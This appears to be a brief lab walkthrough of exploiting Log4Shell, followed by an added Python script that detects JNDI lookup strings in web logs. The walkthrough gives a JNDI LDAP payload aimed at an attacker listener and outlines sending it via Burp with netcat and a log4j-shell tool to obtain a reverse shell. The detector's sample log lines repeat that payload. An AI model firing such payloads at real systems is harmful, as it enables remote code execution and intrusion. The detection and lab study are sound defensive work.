Log4Shell
Check this article for more info.

To check for the Log4Shell exploit:

${jndi:ldap://10.8.0.178:4444/a}

Then URL-encode it and send it through Burp after intercepting the request:

Listening on nc:

We get some weird characters back.
Then we can use a log4j-shell. Download Java and execute it.
Then send the payload:

Sending the URL-encoded payload in Burp Suite.
Now we get a shell back:
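
For the defender's side of the check above, this added example (not part of the original write-up) scans web log lines for the JNDI lookup string, percent-decoding first because the probe is sent URL-encoded. The function names and the log lines are constructed for illustration; only the plain lookup form shown on this page is matched.

```python
import re
from urllib.parse import unquote

# Matches a plain JNDI lookup and captures scheme, host and optional port.
# Nested-lookup variants are out of scope and need additional rules.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?[^}]*\}",
    re.IGNORECASE,
)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly: proxies and apps may decode more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(log_line):
    """Return (scheme, host, port) for each JNDI lookup found in one log line."""
    hits = []
    for m in JNDI_RE.finditer(fully_decode(log_line)):
        port = int(m.group("port")) if m.group("port") else None
        hits.append((m.group("scheme").lower(), m.group("host"), port))
    return hits

def scan(lines):
    """Map 1-based line number -> lookups found, skipping clean lines."""
    report = {}
    for number, line in enumerate(lines, 1):
        hits = find_jndi_lookups(line)
        if hits:
            report[number] = hits
    return report

# Constructed access-log lines: clean, URL-encoded, raw in a header, double-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - "GET /search?q=shoes HTTP/1.1" 200',
    '192.0.2.44 - - "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F10.8.0.178%3A4444%2Fa%7D HTTP/1.1" 200',
    '192.0.2.44 - - "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://10.8.0.178:4444/a}"',
    '192.0.2.44 - - "GET /x?y=%2524%257Bjndi%253Aldap%253A%252F%252F10.8.0.178%253A4444%252Fa%257D HTTP/1.1" 404',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        for scheme, host, port in hits:
            print(f"line {number}: JNDI lookup via {scheme} to {host}:{port}")
```

The extracted host and port are the callback address, which can be matched against outbound connection logs from the application server.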
